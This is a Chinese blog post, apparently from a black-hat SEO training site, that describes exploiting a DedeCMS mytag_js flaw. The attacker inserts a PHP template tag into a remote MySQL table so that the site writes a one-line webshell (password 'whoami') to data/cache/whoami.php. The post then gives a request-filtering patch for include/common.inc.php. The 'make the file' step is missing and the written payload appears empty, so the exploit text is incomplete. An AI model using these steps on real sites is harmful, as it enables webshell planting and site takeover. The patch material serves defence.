dedecms 最新漏洞 利用mytag_js上传文件

原创 SEO培训  2019-08-04 10:04  阅读 7 views 次 评论 0 条

制作文件







然后在自己远程支持外链的mysql库中的表前缀_mytag 中插入insert into dede_mytag(aid,normbody) values(2,'{dede:php}$fp = @fopen(DEDEROOT."data/cache/whoami.php", ''a'');@fwrite($fp, '''');echo "y";@fclose($fp);{/dede:php}{/dede:php}');然后用exp提交后会在data/cache/whoami.php 生成一句话 一句话密码whoami需要注意的地方就是当时挖出来的时候 测试了N久。。 最后才发现原来是浏览器的问题,用firefox打开exp提交就行了。   修复方法:这个漏洞主要的成因是dedecms没有判断外部提交的变量。暂时的修复方法找到include/common.inc.php文件,把 foreach($_REQUEST as $_k=>$_v) { var_dump($_k); if( strlen($_k)>0 && preg_match(‘#^(cfg_|GLOBALS)#’,$_k) ) { exit(‘Request var not allow!’); } } 换成 //检查和注册外部提交的变量 function CheckRequest(&$val) { if (is_array($val)) { foreach ($val as $_k=>$_v) { CheckRequest($_k); CheckRequest($val[$_k]); } } else { if( strlen($val)>0 && preg_match(‘#^(cfg_|GLOBALS)#’,$val) ) { exit(‘Request var not allow!’); } } } CheckRequest($_REQUEST); 收 藏

历史上的今天:

本文地址:https://www.dgseo163.com/seos/7717.html
关注我们:请关注一下我们的微信公众号:扫描二维码黑帽seo | SEO技术核心算法培训_黑帽优化实战赚钱技术推广的公众号,QQ:1358589665
版权声明:本文为原创文章,版权归 SEO培训 所有,欢迎分享本文,转载请保留出处!

评论已关闭!